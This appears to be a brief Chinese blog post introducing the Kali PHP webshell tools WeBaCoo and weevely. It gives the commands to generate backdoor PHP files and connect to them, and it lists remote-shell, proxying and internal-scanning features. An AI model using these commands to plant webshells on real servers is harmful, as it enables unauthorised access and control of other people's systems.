这里简单介绍kali下的两款工具,时间比较仓促,简单的说下,后面再继续更新一些详细内容
一款小巧的php后门工具:WeBaCoo
全名:Web Backdoor Cookie
简介:kali已经集成,产生终端性shell,编码类型通过http头传输,隐蔽性比较强
优缺点:方便简单,适合作为临时shell,没有密码,只能用于php
使用方法:
生成服务端程序
webacoo -g -o a.php
客户端连接:
webacoo -t -u http://127.0.0.1/a.php
连接的权限为当前服务器的权限,权限比较小,能做的事情很有限.
第二款:weevely
具有隐蔽性的类终端PHP webshell[拥有linux上的菜刀之称]
30多个强大的管理模块
可用于执行系统命令,浏览文件系统
检查服务器常见配置错误
创建正向,反向TCP Shell链接
通过目标主机代理HTTP流量
从目标主机运行端口扫描,进行内网渗透
可以设置密码,看了网上的很多文章提到了kali自带的weevely缺少pysockets库,而不能正常运行,需要安装其模块,可以用豆瓣源然后去安装
https://pypi.doubanio.com/simple
点击豆瓣源链接下载pysockets压缩包到本地,解压缩后执行下一条命令
./setup.py install
生成服务端程序:
weevely generate <password> 1.php
客户端连接:
weevely http://127.0.0.1/1.php <password>
连接成功后,可以做的事情就多了,时间仓促,改日更